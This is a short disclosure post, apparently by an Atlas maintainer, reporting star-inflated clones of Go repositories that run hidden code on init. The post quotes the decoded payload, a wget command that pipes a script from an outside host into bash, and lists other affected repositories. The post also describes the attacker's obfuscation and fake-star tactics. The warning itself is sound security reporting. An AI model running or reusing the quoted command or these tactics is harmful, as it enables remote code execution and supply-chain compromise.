Someone copied our GitHub project, made it look more trustworthy by adding stars from many fake users, and then injected malicious code at runtime for potential users.

Our project is Atlas, and one of the providers we offer for it is the provider for GORM: https://github.com/ariga/atlas-provider-gorm (quite popular in our community).

Something crazy I found today before it went viral is that someone copied our GitHub project, faked stars for credibility from accounts created just a few weeks ago, and then injected malicious code at runtime for potential users.

The project: https://github.com/readyrevena/atlas-provider-gorm

The malicious code parts: https://github.com/readyrevena/atlas-provider-gorm/blob/master/gormschema/gorm.go#L403-L412 . This basically executes the following code on init:

wget -O - https://requestbone.fun/storage/de373d0df/a31546bf | /bin/bash &

I went over some of the stargazers, and it looks like it was done for other projects too. I expect the impact is much bigger that just our project.

• https://github.com/ourspiral/href-counter/blob/master/app.go#L97-L106
• https://github.com/slipperyclos/kubernixos/blob/master/kubeclient/delete.go#L22
• https://github.com/quarterlyairs/shelly-bulk-update/blob/master/main.go#L347
• https://github.com/jadedexpens/atlas-provider-gorm/blob/master/gormschema/gorm.go#L403
• https://github.com/animatedspan/terraform-provider-atlas/blob/master/internal/provider/atlas_migration_data_source.go#L296
• https://github.com/turbulentsu/source-watcher/blob/master/controllers/gitrepository_predicate.go#L71
• https://github.com/likableratio/gonet/blob/master/gonet.go#L227

Update: It's hard to detect the full impact. The attacker obfuscates the code, changing identifiers and scrambling the byte array order, so you can't easily search for it on GitHub. This makes it nearly impossible to track the full impact unless GitHub steps up and helps resolve this issue (I reported these repos to GitHub support).